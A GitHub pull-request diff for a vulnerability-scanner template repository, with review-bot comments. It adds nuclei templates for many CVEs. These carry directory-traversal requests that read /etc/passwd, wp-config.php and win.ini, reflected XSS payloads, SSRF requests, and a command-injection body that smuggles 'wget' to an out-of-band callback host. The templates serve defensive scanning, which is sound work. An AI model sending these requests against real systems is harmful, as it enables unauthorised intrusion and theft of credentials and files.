Merge pull request #79 from projectdiscovery/master

Updation
patch-1
Dhiyaneshwaran 2021-08-05 15:24:35 +05:30 committed by GitHub
commit 22aa5c67ee
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
108 changed files with 3817 additions and 1390 deletions


@ -9,6 +9,7 @@ on:
jobs:
build:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates' && github.ref == 'refs/heads/master'
steps:
- name: Checkout Repo
uses: actions/checkout@master
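Review bot: `uses: actions/checkout@master` pins the action to a mutable branch, so anyone who can push to that branch changes what runs inside this workflow; pin it to a release tag or, better, a full commit SHA (`actions/checkout@<commit-sha>`). The new `if:` guard on `github.repository` and `github.ref` is a good addition, since it stops the job from running on forks and non-master refs.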


@ -97,3 +97,4 @@ You can refer to the following articles of Git and GitHub basics. In case you ar
- **Nuclei** outcomes are only as excellent as **template matchers💡**
- Declare at least two matchers to reduce false positive
- Avoid matching words reflected in the URL to reduce false positive
- Avoid short word that could be encountered anywhere
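Review bot: the three new bullets read "reduce false positive" and "Avoid short word"; make them plural ("reduce false positives", "Avoid short words that could be encountered anywhere") so they read as guidance and match the first bullet's register.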


@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 |
| panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 |
| xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 |
| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 |
| exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | |
| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | |
| cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | |
| lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | |
| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | |
| config | 90 | gaurang | 42 | workflows | 34 | | | | |
| cve | 547 | dhiyaneshdk | 232 | cves | 554 | info | 569 | http | 1646 |
| panel | 213 | pikpikcu | 225 | vulnerabilities | 252 | high | 441 | file | 44 |
| xss | 202 | pdteam | 189 | exposed-panels | 215 | medium | 371 | network | 35 |
| wordpress | 189 | dwisiswant0 | 126 | exposures | 170 | critical | 210 | dns | 11 |
| rce | 181 | geeknik | 122 | technologies | 156 | low | 150 | | |
| exposure | 180 | daffainfo | 114 | misconfiguration | 119 | | | | |
| lfi | 155 | madrobot | 60 | takeovers | 70 | | | | |
| cve2020 | 153 | gy741 | 54 | default-logins | 49 | | | | |
| wp-plugin | 127 | princechaddha | 53 | file | 44 | | | | |
| tech | 97 | gaurang | 42 | workflows | 34 | | | | |
**138 directories, 1709 files**.
**139 directories, 1792 files**.
</td>
</tr>



@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 |
| panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 |
| xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 |
| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 |
| exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | |
| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | |
| cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | |
| lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | |
| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | |
| config | 90 | gaurang | 42 | workflows | 34 | | | | |
| cve | 547 | dhiyaneshdk | 232 | cves | 554 | info | 569 | http | 1646 |
| panel | 213 | pikpikcu | 225 | vulnerabilities | 252 | high | 441 | file | 44 |
| xss | 202 | pdteam | 189 | exposed-panels | 215 | medium | 371 | network | 35 |
| wordpress | 189 | dwisiswant0 | 126 | exposures | 170 | critical | 210 | dns | 11 |
| rce | 181 | geeknik | 122 | technologies | 156 | low | 150 | | |
| exposure | 180 | daffainfo | 114 | misconfiguration | 119 | | | | |
| lfi | 155 | madrobot | 60 | takeovers | 70 | | | | |
| cve2020 | 153 | gy741 | 54 | default-logins | 49 | | | | |
| wp-plugin | 127 | princechaddha | 53 | file | 44 | | | | |
| tech | 97 | gaurang | 42 | workflows | 34 | | | | |


@ -0,0 +1,27 @@
id: CVE-2010-4617
info:
name: Joomla! Component JotLoader 2.2.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/15791
- https://www.cvedetails.com/cve/CVE-2010-4617
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
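Review bot: `reference: |` makes the two `- https://…` lines one multi-line string rather than a YAML sequence, so tooling that reads references as a list gets a single blob; the CVE-2018-15517 template in this same PR uses a plain `reference:` sequence, which is the parseable form. Use that form here and in the other new templates that copy this pattern.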


@ -0,0 +1,33 @@
id: CVE-2011-4336
info:
name: Tiki Wiki CMS Groupware 7.0 has XSS
author: pikpikcu
severity: medium
description: Tiki Wiki CMS Groupware 7.0 has XSS via the GET "ajax" parameter to snarf_ajax.php.
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2011-4336
- https://www.securityfocus.com/bid/48806/info
- https://seclists.org/bugtraq/2011/Nov/140
tags: cve,cve2011,xss,tikiwiki
requests:
- method: GET
path:
- "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html


@ -0,0 +1,27 @@
id: CVE-2012-0991
info:
name: OpenEMR 4.1 - Local File Inclusion
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.
reference: |
- https://www.exploit-db.com/exploits/36650
- https://www.cvedetails.com/cve/CVE-2012-0991
tags: cve,cve2012,lfi,openemr
requests:
- method: GET
path:
- "{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
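Review bot: the description says the traversal is reachable by "remote authenticated users", but the request carries no session, so on an instance that enforces login the redirect will fail both the `status: 200` and the `root:.*:0:0` matchers. State in the description that the template only detects installs where `contrib/acog/print_form.php` is reachable without authentication, otherwise users will read a clean scan as "not vulnerable".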


@ -0,0 +1,27 @@
id: CVE-2012-4253
info:
name: MySQLDumper 1.24.4 - Directory Traversal
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.
reference: |
- https://www.exploit-db.com/exploits/37129
- https://www.cvedetails.com/cve/CVE-2012-4253
tags: cve,cve2012,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
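Review bot: the description lists three traversal points (`language`, `f` and `config`), but the request only exercises `f` in `filemanagement.php`; either trim the description to what the template actually tests or note which vector is covered, so a negative result is not read as covering all three.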


@ -0,0 +1,31 @@
id: CVE-2014-4535
info:
name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
- https://nvd.nist.gov/vuln/detail/CVE-2014-4535
tags: cve,cve2014,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/importlegacymedia/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "'></script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
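Review bot: this template has no `description:` field, and the wpscan page is its only non-NVD source; add a one-line description (plugin, the `filename` parameter of `demo.mimeonly.php`, unauthenticated reflected XSS) so the finding is self-explanatory in nuclei output. The same gap is in CVE-2014-4536, CVE-2015-2807, CVE-2015-9414 and CVE-2016-1000148 in this PR.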


@ -0,0 +1,31 @@
id: CVE-2014-4536
info:
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
- https://nvd.nist.gov/vuln/detail/CVE-2014-4536
tags: cve,cve2014,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
matchers-condition: and
matchers:
- type: word
words:
- '"></script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
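Review bot: the path injects three different payloads into `go`, `contactId` and `campaignId` and ends with a dangling `&`, yet the body matcher only checks the `contactId` marker; drop the two unused `document.cookie` payloads and the trailing `&` so the request is minimal and the match is unambiguous. A description line is also missing here.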


@ -0,0 +1,31 @@
id: CVE-2014-8799
info:
name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.
reference: |
- https://www.exploit-db.com/exploits/35346
- https://www.cvedetails.com/cve/CVE-2014-8799
tags: cve,cve2014,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php"
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
- "DB_USER"
- "DB_HOST"
part: body
condition: and
- type: status
status:
- 200


@ -15,7 +15,7 @@ info:
requests:
- method: POST
path:
- "{{BaseURL}}/"
- "{{BaseURL}}"
headers:
Referer: \x00


@ -0,0 +1,31 @@
id: CVE-2015-2807
info:
name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/
- https://nvd.nist.gov/vuln/detail/CVE-2015-2807
tags: cve,cve2015,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -0,0 +1,31 @@
id: CVE-2015-9414
info:
name: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095
- https://nvd.nist.gov/vuln/detail/CVE-2015-9414
tags: cve,cve2015,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -4,7 +4,10 @@ info:
name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000128
description: Reflected XSS in wordpress plugin anti-plagiarism v3.60
reference: |
- http://www.vapidlabs.com/wp/wp_advisory.php?v=161
- https://wordpress.org/plugins/anti-plagiarism
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
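Review bot: the rewrite drops the `https://nvd.nist.gov/vuln/detail/CVE-2016-1000128` entry that the old single-line `reference:` carried; keep the NVD record in the new list next to the vapidlabs advisory, since it is the canonical source for the CVE id and the one most readers will cross-check.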


@ -0,0 +1,31 @@
id: CVE-2016-1000148
info:
name: S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000148
tags: cve,cve2016,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script><"'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -0,0 +1,29 @@
id: CVE-2016-1000149
info:
name: Simpel Reserveren 3 <= 3.5.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000149
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -0,0 +1,29 @@
id: CVE-2016-1000153
info:
name: Tidio Gallery <= 1.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000153
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -0,0 +1,29 @@
id: CVE-2016-1000155
info:
name: WPSOLR <= 8.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000155
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -0,0 +1,31 @@
id: CVE-2016-10993
info:
name: ScoreMe Theme - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://www.vulnerability-lab.com/get_content.php?id=1808
- https://nvd.nist.gov/vuln/detail/CVE-2016-10993
tags: cve,cve2016,wordpress,wp-theme,xss
requests:
- method: GET
path:
- "{{BaseURL}}/?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
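Review bot: the request only reflects the generic site search parameter `s` at `/?s=`, so any site that echoes its search term unescaped will match, not just the ScoreMe theme that the `wp-theme` tag and the name claim; add a second body matcher on a ScoreMe-specific string (a theme asset path under `wp-content/themes/`) with `matchers-condition: and`, so a hit is attributable to this CVE rather than to any reflected-search XSS.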


@ -33,3 +33,8 @@ requests:
- '"name":'
- '"avatar_urls":'
condition: and
extractors:
- type: regex
part: body
regex:
- '"name":"[^"]*"'


@ -0,0 +1,31 @@
id: CVE-2018-10095
info:
name: Dolibarr before 7.0.2 allows XSS.
author: pikpikcu
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in Dolibarr before 7.0.2 allows remote attackers to inject arbitrary web script or HTML via the foruserlogin parameter to adherents/cartes/carte.php.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-10095
tags: cve,cve2018,xss,dolibarr
requests:
- method: GET
path:
- "{{BaseURL}}/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html
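Review bot: the path hard-codes a `/dolibarr/` prefix, whereas every other template in this PR addresses the application at `{{BaseURL}}` directly; Dolibarr is commonly served from the web root as well, so list both `{{BaseURL}}/adherents/cartes/carte.php…` and the `/dolibarr/` variant under `path:` to avoid a false negative on root installs.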


@ -0,0 +1,42 @@
id: CVE-201810818
info:
name: LG NAS Devices - Remote Code Execution (Unauthenticated)
author: gy741
severity: critical
description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter.
reference: |
- https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
- https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247
tags: cve,cve2018,lg-nas,rce,oob
requests:
- raw:
- |
POST /system/sharedir.php HTTP/1.1
Host: {{Hostname}}
User-Agent: curl/7.58.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
&uid=10; wget http://{{interactsh-url}}
- |
POST /en/php/usb_sync.php HTTP/1.1
Host: {{Hostname}}
User-Agent: curl/7.58.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
&act=sync&task_number=1;wget http://{{interactsh-url}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: status
status:
- 200
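Review bot: `id: CVE-201810818` is missing the hyphen (the description itself says CVE-2018-10818); fix the id, since anything that filters, deduplicates or reports by CVE id will not recognise it. The second reference is an advisory whose URL names a different CVE (CVE-2018-14839), so either mark it as a related issue or replace it with the NVD entry for this one.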


@ -0,0 +1,30 @@
id: CVE-2018-14013
info:
name: Zimbra XSS
author: pikpikcu
severity: medium
description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 has XSS in the AJAX and html web clients.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-14013
tags: cve,cve2018,xss,zimbra
requests:
- method: GET
path:
- "{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html


@ -0,0 +1,21 @@
id: CVE-2018-15517
info:
name: D-LINK Central WifiManager - SSRF
description: Using a web browser or script SSRF can be initiated against internal/external systems to conduct port scans by leveraging D LINKs MailConnect component. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, leading to SSRF, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using Web Browser.
reference:
- http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt
author: gy741
severity: medium
tags: cve,cve2018,dlink,ssrf,oob
requests:
- method: GET
path:
- "{{BaseURL}}/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/"
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"


@ -0,0 +1,27 @@
id: CVE-2018-15745
info:
name: Argus Surveillance DVR - Directory Traversal
author: gy741
severity: high
description: Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
reference: http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt
tags: cve,cve2018,argussurveillance,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "for 16-bit app support"
- "[drivers]"
condition: and


@ -0,0 +1,27 @@
id: CVE-2018-19458
info:
name: PHP Proxy 3.0.3 - Local File Inclusion
author: daffainfo
severity: high
description: In PHP Proxy 3.0.3, any user can read files from the server without authentication due to an index.php?q=file:/// LFI URI, a different vulnerability than CVE-2018-19246.
reference: |
- https://www.exploit-db.com/exploits/45780
- https://www.cvedetails.com/cve/CVE-2018-19458
tags: cve,cve2018,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?q=file:///etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,29 @@
id: CVE-2018-20470
info:
name: Sahi pro 7.x/8.x - Directory Traversal
author: daffainfo
severity: high
description: An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files.
reference: |
- https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/
- https://www.cvedetails.com/cve/CVE-2018-20470
tags: cve,cve2018,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
part: body
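Review bot: the `#selected` at the end of the path is a URL fragment and is never transmitted to the server, so it contributes nothing to the request; remove it so the template is honest about what is sent. The three `win.ini` words under `condition: and` are a good low-false-positive choice.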


@ -18,7 +18,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}"
matchers-condition: and
matchers:


@ -0,0 +1,31 @@
id: CVE-2018-5233
info:
name: Grav CMS before 1.3.0 allows XSS.
author: pikpikcu
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in system/src/Grav/Common/Twig/Twig.php in Grav CMS before 1.3.0 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to admin/tools.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5233
tags: cve,cve2018,xss,grav
requests:
- method: GET
path:
- "{{BaseURL}}/admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html


@ -7,6 +7,7 @@ info:
reference: |
- https://seclists.org/fulldisclosure/2019/May/50
- https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/
- https://www.exploit-db.com/exploits/50119
description: |
The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and
7.0.0 to 7.0.93 echoes user provided data without escaping and is,
@ -18,6 +19,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
- "{{BaseURL}}/ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
matchers-condition: and
matchers:


@ -0,0 +1,29 @@
id: CVE-2019-12276
info:
name: GrandNode 4.40 - Path Traversal
author: daffainfo
severity: high
description: Path Traversal vulnerability in Controllers/LetsEncryptController.cs in LetsEncryptController in GrandNode 4.40 allows remote, unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests. A patch for this issue was made on 2019-05-30 in GrandNode 4.40.
reference: |
- https://security401.com/grandnode-path-traversal/
- https://www.cvedetails.com/cve/CVE-2019-12276
tags: cve,cve2019,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd"
headers:
Connection: close
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -5,7 +5,9 @@ info:
author: daffainfo
severity: medium
description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS.
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16332
reference: |
- https://plugins.trac.wordpress.org/changeset/2152730
- https://wordpress.org/plugins/api-bearer-auth/#developers
tags: cve,cve2019,wordpress,xss,wp-plugin
requests:
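Review bot: as in the anti-plagiarism template edited in this PR, the old `reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16332` line is removed and not carried into the new list; keep the NVD link alongside the changeset and plugin-page links.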


@ -3,8 +3,10 @@ id: CVE-2019-3401
info:
name: Atlassian JIRA Information Exposure (CVE-2019-3401)
author: TechbrunchFR,milo2012
description: The ManageFilters.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check.
severity: info
tags: cve,cve2019,jira,atlassian
reference: https://jira.atlassian.com/browse/JRASERVER-69244
requests:
- method: GET


@ -8,17 +8,23 @@ info:
reference: |
- https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
- https://jira.atlassian.com/browse/JRASERVER-69793
tags: cve,cve2019,atlassian,jira,ssrf
- https://hackerone.com/reports/713900
tags: cve,cve2019,atlassian,jira,ssrf,oob
requests:
- method: GET
- method: POST
path:
- '{{BaseURL}}/plugins/servlet/gadgets/makeRequest?url=https://{{Hostname}}:1337@example.com'
- '{{BaseURL}}/plugins/servlet/gadgets/makeRequest'
body: |
url=https://{{Hostname}}:443@{{interactsh-url}}
headers:
X-Atlassian-token: no-check
Content-Type: application/x-www-form-urlencoded
matchers:
- type: word
name: ssrf-response-body
part: interactsh_protocol
words:
- '<p>This domain is for use in illustrative examples in documents.'
part: body
- "http" # Confirms the HTTP Interaction
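Review bot: the matcher is still labelled `name: ssrf-response-body`, but the body match on the example.com text is gone and the check now runs on `part: interactsh_protocol`; rename it (for instance `ssrf-oob-interaction`) so the label in nuclei output describes what is actually verified. Switching from a fixed third-party host to the interactsh callback is the right change: it proves the server made the outbound connection instead of depending on example.com's page content staying the same.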


@ -3,7 +3,7 @@ id: CVE-2020-13927
info:
name: Unauthenticated Airflow Experimental REST API
author: pdteam
severity: medium
severity: critical
tags: cve,cve2020,apache,airflow,unauth
requests:
@ -17,4 +17,4 @@ requests:
- '"dag_run_url":'
- '"dag_id":'
- '"items":'
condition: and
condition: and
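Review bot: severity is raised from `medium` to `critical` without a description or reference added in the same change; add the NVD link for CVE-2020-13927 to the template so the new rating is traceable for anyone triaging results. The second hunk only changes the trailing newline after `condition: and`.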


@ -0,0 +1,26 @@
id: CVE-2020-27361
info:
name: Akkadian Provisioning Manager - Files Listing
author: gy741
severity: high
description: An issue exists within Akkadian Provisioning Manager 4.50.02 which allows attackers to view sensitive information within the /pme subdirectories.
reference: https://www.blacklanternsecurity.com/2021-07-01-Akkadian-CVE/
tags: cve,cve2020,akkadian,listing,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/pme/media/"
matchers-condition: and
matchers:
- type: word
words:
- "Index of /pme/media"
- "Parent Directory"
condition: and
- type: status
status:
- 200


@ -26,5 +26,11 @@ requests:
- type: regex
regex:
- '^= ([0-4]\.[0-9\.]+|5\.[0-2]|5\.[0-2]\.[0-9]+|5\.3\.[0-1]) ='
- '^== Changelog =="'
part: body
- type: regex
regex:
